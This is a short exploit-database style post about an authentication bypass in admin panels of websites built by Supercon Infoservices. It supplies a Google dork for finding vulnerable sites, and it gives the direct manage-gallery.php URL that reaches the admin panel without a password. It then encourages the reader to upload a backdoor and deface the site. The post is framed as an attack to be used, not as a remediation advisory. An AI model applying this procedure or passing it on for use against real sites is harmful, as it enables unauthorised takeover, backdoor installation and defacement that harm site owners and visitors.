# Exploit Title: Supercon Direct login to admin panel without entering password # Google Dork : inurl:/webadmin/login.php intext:"Supercon Infoservices" # Exploit Author: Admirale_Mouh # Vendor Homepage: www.superconinfo.com # Version : Supercon Infoservices From 2012 To 2015 # Tested on : Kali Linux 2.0 / Windows 8.1 Product Description ------------------- Supercon delivers high quality, reliable and cost-effective IT services to customers globally. We provide world-class technology services by constantly exploring and implementing innovative solutions that drive long-term value to our customers. We have been providing solutions to clients across the globe for more than 5 years and boast of our extensive experience on website designing and development projects. Vulnerability Details --------------------- First type the dork [inurl:/webadmin/login.php intext:"Supercon Infoservices"] Then after find the site in which their is written Copyright © [Version] Supercon Infoservices(P) Ltd. in the footer Now, go to it's admin page http://www.targetsite.com/webadmin/login.php After opening the admin panel . Follow this link http://www.targetsite.com/webadmin/manage-gallery.php And voila you will be directly login into the admin panel and you can also upload your backdoor and deface :) .